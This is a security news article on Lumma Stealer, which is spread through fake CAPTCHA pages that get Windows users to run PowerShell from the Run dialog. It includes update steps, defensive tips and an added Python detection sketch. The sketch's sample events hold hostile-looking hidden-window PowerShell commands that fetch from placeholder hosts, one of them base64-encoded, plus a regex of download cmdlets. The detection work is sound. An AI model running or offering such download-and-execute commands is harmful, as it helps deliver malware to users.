In a concerning development for Windows users, security experts have identified a new strain of malware known as Lumma Stealer, which is being disseminated through deceptive human verification pages. This sophisticated scheme has been uncovered by researchers at CloudSEK, who detail how hackers exploit these fake verification pages to install malicious software on unsuspecting victims’ devices.
Understanding the Threat
The initial report from Palo Alto Networks’ Unit 42 highlighted the use of these fraudulent pages, which often mimic legitimate Google CAPTCHA interfaces. When users interact with these pages, they are misled into executing a PowerShell script that retrieves and installs the Lumma Stealer malware. Paul Michaud II, a threat hunter at Unit 42, explained that the process begins when victims click a button that prompts them to copy a PowerShell command into their system’s Run dialog.
Once executed, this command operates in a hidden window, fetching further instructions from a remote server. The malware is then downloaded in a file named “dengo.zip,” which, when unzipped and run, activates Lumma Stealer, allowing it to connect to domains controlled by the attackers. Researchers have noted that the malware can easily be replaced with other harmful files, increasing the risk for users.
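The chain described above leaves a recognizable trace in process-creation logs. The following is an added detection sketch, not code from the researchers cited here: it flags PowerShell started by explorer.exe (the parent of anything launched from the Run dialog) with a hidden window and a network fetch. It goes one step beyond the article by also decoding `-EncodedCommand` arguments; the Sysmon Event ID 1 field names, the sample events and the `example.invalid` hosts are assumptions constructed for illustration.

```python
import base64
import re

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed records using Sysmon Event ID 1 field names; example.invalid is a placeholder.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": 'powershell -w hidden -c "iwr https://example.invalid/a.txt"'},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": "powershell -WindowStyle Hidden -enc " + base64.b64encode(
         "irm https://example.invalid/b".encode("utf-16-le")).decode()},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": "powershell -NoProfile -Command Get-ChildItem"},
    {"ParentImage": r"C:\Windows\System32\svchost.exe", "Image": PS,
     "CommandLine": "powershell -w hidden -c iwr https://example.invalid/u"},
]

# "-name value" pairs; PowerShell accepts any unambiguous prefix of a parameter name.
PARAM = re.compile(r"(?<!\S)[-/]([A-Za-z]+)\s+([^\s-]\S*)")
# Cmdlets, aliases and WebClient methods that retrieve content over the network.
FETCH = re.compile(r"(?i)\b(invoke-webrequest|iwr|invoke-restmethod|irm|curl|wget|"
                   r"start-bitstransfer|downloadstring|downloadfile)\b")

def params(cmdline):
    """Return (lower-cased name, unquoted value) for each '-name value' pair."""
    return [(m.group(1).lower(), m.group(2).strip("\"'")) for m in PARAM.finditer(cmdline)]

def expand(cmdline):
    """Return the command line plus the decoded body of any -EncodedCommand argument."""
    parts = [cmdline]
    for name, value in params(cmdline):
        if name == "ec" or "encodedcommand".startswith(name):
            try:  # -EncodedCommand carries base64 of UTF-16LE text
                parts.append(base64.b64decode(value, validate=True).decode("utf-16-le"))
            except ValueError:
                pass  # not valid base64/UTF-16, nothing more to scan
    return "\n".join(parts)

def is_run_dialog_lure(event):
    """True when explorer.exe starts PowerShell with a hidden window and a web fetch."""
    from_explorer = event["ParentImage"].lower().endswith("\\explorer.exe")
    is_ps = event["Image"].lower().endswith(("\\powershell.exe", "\\pwsh.exe"))
    cmd = event["CommandLine"]
    hidden = any("windowstyle".startswith(n) and v.lower() == "hidden" for n, v in params(cmd))
    return from_explorer and is_ps and hidden and bool(FETCH.search(expand(cmd)))

def flagged(events):
    """Return the indexes of events that match the lure pattern."""
    return [i for i, e in enumerate(events) if is_run_dialog_lure(e)]
```

Legitimate shortcuts and scripts can also start hidden PowerShell from explorer.exe, so matches are leads for triage rather than verdicts.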
Protecting Your System
To mitigate the risks associated with such malware, it is crucial for users to ensure that their Windows systems, browsers, and antivirus software are consistently updated. Regular software updates often include critical security patches that protect against known vulnerabilities. Here’s how to keep your Windows software up to date:
For Windows 10 and Windows 11
- Click on the Start menu and select Settings (or press the Windows key + I).
- In the Settings window, click on Update & Security.
- Under the “Windows Update” section, click on Check for updates.
- If updates are available, they will download and install automatically.
- Restart your computer if prompted to apply the updates.
For Windows 8.1 and Earlier Versions
- Open the Control Panel and navigate to System and Security.
- Under the “Windows Update” section, click on Check for updates.
- Select any available updates and click Install updates.
- Follow the on-screen instructions to complete the installation.
- Restart your computer if prompted.
Additional Protective Measures
To further safeguard against Lumma Stealer and similar threats, consider the following strategies:
- Utilize Robust Antivirus Software: A reliable antivirus program can detect and block threats before they inflict damage. Ensure it is installed on all devices.
- Scrutinize CAPTCHA Pages: Authentic Google CAPTCHA pages will not request file downloads or command executions. If something seems amiss, exit immediately.
- Avoid Running Unfamiliar Commands: Never execute commands that you do not fully understand, especially those copied from untrusted sources.
- Maintain Software Updates: Regularly update your operating system and applications to patch vulnerabilities.
- Implement Two-Factor Authentication (2FA): Enable 2FA on all accounts for an added layer of security against unauthorized access.
As cyber threats evolve, remaining vigilant and informed is essential for protecting personal and professional data. By adopting these practices, users can significantly reduce their risk of falling victim to sophisticated malware schemes like Lumma Stealer.